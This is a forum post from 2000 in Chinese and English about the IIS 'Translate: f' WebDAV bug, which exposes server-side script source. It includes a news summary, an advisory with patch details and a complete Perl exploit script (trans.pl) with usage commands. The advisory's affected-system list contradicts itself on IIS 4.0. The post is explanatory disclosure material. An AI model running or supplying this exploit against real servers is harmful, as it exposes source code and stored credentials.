![]() ![]() ![]() ![]() |
|||||
|
|||||
樓主 站務人員 站長 ![]()
![]() ![]() ![]() |
「攻擊程式網上曝光,可進入微軟伺服器」 根據CNET報導指出,一家捷克業者製作的網路安全檢查程式,可偵測出網路漏洞,進入 微軟IIS的伺服器裡面,取得使用者密碼等相關重要資料。根據 wired.com 報導,這家 捷克 iDEFENSE 資訊服務公司表示,原本提供的檢查程式是為了讓網管測試自己系統有 無漏洞,卻不料可以淪為駭客入侵的工具。 iDEFENSE 資訊服務公司指出,由於這項程 式公佈的太突然,微軟方面還來不及推出相關修補程式,所以導致可能會發生不少 IIS 伺服器被攻擊的事件......... 其實 iDEFENSE 公司所公佈的檢查程式,對於很多接觸駭客較久的網友都知道,那是一 種網站 scanner 安全檢查程式,可以檢查出該網站是否有存在已經知道的系統漏洞。 但是這次 iDEFENSE 提供檢查程式捅出漏子的原因,是因為它們的檢查程式裡面包 括了一個 IIS 新的系統漏洞,這個漏洞在微軟還未提供修補程式之前,就已經公佈在 網站上,所以導致有些駭客可能因此藉著這個漏洞入侵到別人的 IIS 網站裡面。 而 iDEFENSE 發生「凸錘」的漏洞,就是這個名為「Translate:f」的漏洞。 漏洞大綱︰ A vulnerability in IIS allows remote attackers to view the source of offered server side scripts supported by IIS (such as ASP, ASA, HTR, etc.). This vulnerability is very dangerous since a lot of sensitive information is kept in these files, since programmers often rely on the fact that the source code is hidden from the user. The vulnerability involves sending a special header with 'Translate: f' at the end of it, and then a trailing slash '/' appended to the end of the URL. It cannot be exploited by the standard browsers, but an exploit code below enables to test for this problem. 詳細內容︰ 漏洞系統︰ Microsoft Windows NT 2000 (IIS 5.0) Windows NT 4.0 with FrontPage Server Extensions 2000 免疫系統︰ Microsoft IIS 4.0 and below WebDAV implemented in Windows 2000 and Office 2000 (including FrontPage 2000 and FrontPage 2000 Server extensions) is the source of Translate:f problem. When someone makes request for ASP/ASA (or any other scriptable page) and adds "Translate: f" into headers of HTTP GET request (headers are not part of the URL, they are part of the raw HTTP request), there is a serious security bug in Windows 2000 (when unpatched by SP1) that in return gives complete ASP/ASA code instead of processed file. It's necessary to add a trailing slash "/" to end of requested URL to make this work. "Translate:f" is legitimate header for WebDAV, it is used as it should be - adding this to HTTP GET is a signal for the WebDAV component to return the source code of the requested file and bypass processing. It is used in FrontPage2000 and any WebDAV compatible client to get a file for editing. It has to be accompanied by some other information, which should prevent unauthorized users from viewing the source. Unfortunately, a coding problem makes it possible to retrieve those files by simply adding "Translate:f" in the header, and placing "/" at end of request to the HTTP GET. It is a Windows 2000 bug, but because of FrontPage Server Extensions 2000 can be installed even on IIS 4.0 sites, it also affectes IIS 4.0. Many IIS 4.0 sites will exhibit the "Translate: f" bug when web files are stored on a shared (network) directory, this vulnerability has been fixed in the past (see our previous article: Patch Available for the Virtualized UNC Share Vulnerability). 修正程式︰ Microsoft has released the following patch, which eliminates this vulnerability: Microsoft patch Q256888_W2K_SP1_x86_en 漏洞攻擊程式原始碼︰ Typical usage: $ perl trans.pl www.example.com login.asp 80 To use against SSL sites: 1) $ sslproxy -L 127.0.0.1 -l 7555 -R www.example.com -r 443 -v Class3.pem 2) $ perl trans.pl 127.0.0.1 login.asp 7555 ---cut: trans.pl--- #!/usr/bin/perl use Socket; ####test arguments if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";} #####load values $host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1]; #####build request $xtosend=<<EOT GET /$toget\\ HTTP/1.0 Host: $host User-Agent: SensePostData Content-Type: application/x-www-form-urlencoded Translate: f EOT ; $xtosend=~s/\n/\r\n/g; ####send request #print $xtosend; my @results=sendraw($xtosend); print @results; #### Sendraw - thanx RFP rfp@wiretrip.net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_; print STDOUT "." if(defined $args{X});} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } ---cut----
本篇文章發表於2000-09-18 00:00
|